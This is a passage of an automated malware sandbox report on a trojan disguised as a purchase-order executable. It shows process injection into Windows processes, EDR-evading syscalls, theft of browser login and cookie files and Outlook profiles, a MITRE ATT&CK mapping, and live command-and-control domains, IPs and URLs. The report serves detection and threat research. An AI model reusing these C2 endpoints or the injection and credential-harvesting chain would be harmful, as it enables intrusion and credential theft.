            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtCreateFile: Direct from: 0x77762FEC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtOpenFile: Direct from: 0x77762DCC
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtOpenKeyEx: Direct from: 0x77762B9C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtSetInformationProcess: Direct from: 0x77762C5C
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 6724
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E86008
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00436CD7 LogonUserW | 0_2_00436CD7
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW | 0_2_0040D590
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_00434418
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event | 0_2_0043333C
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO# Q919240.exe"
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 0_2_00446124
            Source: PO# Q919240.exe, fALrZoEgBHis.exe, 00000003.00000002.2706935691.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000000.1576488958.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000000.1735897444.00000000016A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: fALrZoEgBHis.exe, 00000003.00000002.2706935691.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000000.1576488958.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000000.1735897444.00000000016A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: fALrZoEgBHis.exe, 00000003.00000002.2706935691.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000000.1576488958.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000000.1735897444.00000000016A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
            Source: fALrZoEgBHis.exe, 00000003.00000002.2706935691.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000000.1576488958.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000000.1735897444.00000000016A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: PO# Q919240.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW | 0_2_004720DB
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00472C3F GetUserNameW | 0_2_00472C3F
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte | 0_2_0041E364
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary | 0_2_0040E500

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: PO# Q919240.exe | Binary or memory string: WIN_XP
            Source: PO# Q919240.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: PO# Q919240.exe | Binary or memory string: WIN_XPe
            Source: PO# Q919240.exe | Binary or memory string: WIN_VISTA
            Source: PO# Q919240.exe | Binary or memory string: WIN_7
            Source: PO# Q919240.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket | 0_2_004652BE
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket | 0_2_00476619
            Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject | 0_2_0046CEF3
            MITRE ATT&CK Matrix

            The matrix is listed per tactic (one column of the original table per line, cells in top-to-bottom order). Digits preceding a technique name are the report's badge counts, reproduced as extracted.

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
            Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 16 System Information Discovery; 141 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Encrypted for Impact; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
            Behavior Graph (ID: 1515409, Sample: PO# Q919240.exe, Startdate: 22/09/2024, Architecture: WINDOWS, Score: 100)

            The graph image is not reproduced; its nodes and edges are listed below.

            Sample-level DNS/IP: www.woshop.online; www.tekilla.wtf; 10 other IPs or domains
            Sample-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); 8 other signatures

            • PO# Q919240.exe (1), started
              Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
              • svchost.exe, started
                Signatures: Maps a DLL or memory area into another process
                • fALrZoEgBHis.exe, injected
                  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                  • netbtugc.exe (13), started
                    Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                    • fALrZoEgBHis.exe, injected
                      DNS/IP: www.kexweb.top 63.250.47.40, ports 49727, 49728, 49729, NAMECHEAP-NETUS, United States; bola88site.one 172.96.191.39, ports 49719, 49720, 49721, LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG, Canada; 4 other IPs or domains
                      Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    • firefox.exe, started

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Antivirus, Machine Learning and Genetic Malware Detection

            Source | Detection | Scanner | Label
            PO# Q919240.exe | 71% | ReversingLabs | Win32.Trojan.Autoitinject
            PO# Q919240.exe | 74% | Virustotal |
            PO# Q919240.exe | 100% | Avira | HEUR/AGEN.1321685
            PO# Q919240.exe | 100% | Joe Sandbox ML |

            No Antivirus matches

            No Antivirus matches

            Source | Detection | Scanner | Label
            www.elsupertodo.net | 3% | Virustotal |
            webredir.vip.gandi.net | 0% | Virustotal |
            www.kexweb.top | 2% | Virustotal |
            bola88site.one | 0% | Virustotal |
            omexai.info | 0% | Virustotal |
            www.omexai.info | 0% | Virustotal |
            www.bola88site.one | 0% | Virustotal |
            www.languagemodel.pro | 1% | Virustotal |
            www.kxshopmr.store | 0% | Virustotal |
            www.woshop.online | 2% | Virustotal |
            www.tekilla.wtf | 0% | Virustotal |

            Source | Detection | Scanner | Label
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            http://www.omexai.info/7xi5/ | 100% | Avira URL Cloud | malware
            https://www.elsupertodo.net/2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryY | 100% | Avira URL Cloud | malware
            http://www.kexweb.top/3bdq/ | 0% | Avira URL Cloud | safe
            http://www.languagemodel.pro/nxfn/ | 0% | Avira URL Cloud | safe
            http://www.bola88site.one/3qit/ | 0% | Avira URL Cloud | safe
            http://www.kexweb.top/3bdq/ | 2% | Virustotal |
            http://www.bola88site.one/3qit/ | 2% | Virustotal |
            http://www.languagemodel.pro/nxfn/ | 2% | Virustotal |
            http://www.kexweb.top/3bdq/?H0QP6=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&OXVx9=WNjT | 0% | Avira URL Cloud | safe
            http://www.omexai.info/7xi5/ | 6% | Virustotal |
            http://www.kexweb.top | 0% | Avira URL Cloud | safe
            https://www.gandi.net/en/domain | 0% | Virustotal |
            http://www.languagemodel.pro/nxfn/?H0QP6=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x&OXVx9=WNjT | 0% | Avira URL Cloud | safe
            https://www.gandi.net/en/domain | 0% | Avira URL Cloud | safe
            http://www.omexai.info/7xi5/?H0QP6=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&OXVx9=WNjT | 100% | Avira URL Cloud | malware
            http://www.tekilla.wtf/fpzw/ | 100% | Avira URL Cloud | malware
            https://whois.gandi.net/en/results?search=languagemodel.pro | 0% | Avira URL Cloud | safe
            http://www.tekilla.wtf/fpzw/?H0QP6=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU&OXVx9=WNjT | 100% | Avira URL Cloud | malware
            https://whois.gandi.net/en/results?search=languagemodel.pro | 0% | Virustotal |
            http://www.kexweb.top | 2% | Virustotal |
            http://www.tekilla.wtf/fpzw/ | 6% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.elsupertodo.net | 148.72.152.174 | true | true | | unknown
webredir.vip.gandi.net | 217.70.184.50 | true | true | | unknown
www.kexweb.top | 63.250.47.40 | true | true | | unknown
bola88site.one | 172.96.191.39 | true | true | | unknown
redirect.3dns.box | 172.191.244.62 | true | true | | unknown
omexai.info | 3.33.130.190 | true | true | | unknown
www.bola88site.one | unknown | unknown | true | | unknown
www.tekilla.wtf | unknown | unknown | true | | unknown
www.omexai.info | unknown | unknown | true | | unknown
www.woshop.online | unknown | unknown | true | | unknown
www.kxshopmr.store | unknown | unknown | true | | unknown
www.languagemodel.pro | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.omexai.info/7xi5/ | true | 6%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.kexweb.top/3bdq/ | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.languagemodel.pro/nxfn/ | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.bola88site.one/3qit/ | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.kexweb.top/3bdq/?H0QP6=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv2wVl5tEpDmVzrjnyzZwQXC/AEB58FOwV7HJGPZNP2SejBf9M+4Q+mbI&OXVx9=WNjT | true | Avira URL Cloud: safe | unknown
http://www.languagemodel.pro/nxfn/?H0QP6=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfUOnUHUTgavpIKdyJZhbpRDfHBgtRvaLwhSA3LIOv4/Kx2UtnF+bA/8x&OXVx9=WNjT | true | Avira URL Cloud: safe | unknown
http://www.omexai.info/7xi5/?H0QP6=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&OXVx9=WNjT | true | Avira URL Cloud: malware | unknown
http://www.tekilla.wtf/fpzw/ | true | 6%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://www.tekilla.wtf/fpzw/?H0QP6=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU&OXVx9=WNjT | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.elsupertodo.net/2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryY | netbtugc.exe, 00000005.00000002.2710234659.0000000004778000.00000004.10000000.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.00000000036A8000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2063649415.000000003C2D8000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.gandi.net/en/domain | netbtugc.exe, 00000005.00000002.2710234659.0000000004DC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2711751819.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000003CF0000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.kexweb.top | fALrZoEgBHis.exe, 00000006.00000002.2709976615.0000000005433000.00000040.80000000.00040000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://whois.gandi.net/en/results?search=languagemodel.pro | netbtugc.exe, 00000005.00000002.2710234659.0000000004DC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2711751819.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000003CF0000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.191.244.62 | redirect.3dns.box | United States | 7018 | ATT-INTERNET4US | true
63.250.47.40 | www.kexweb.top | United States | 22612 | NAMECHEAP-NETUS | true
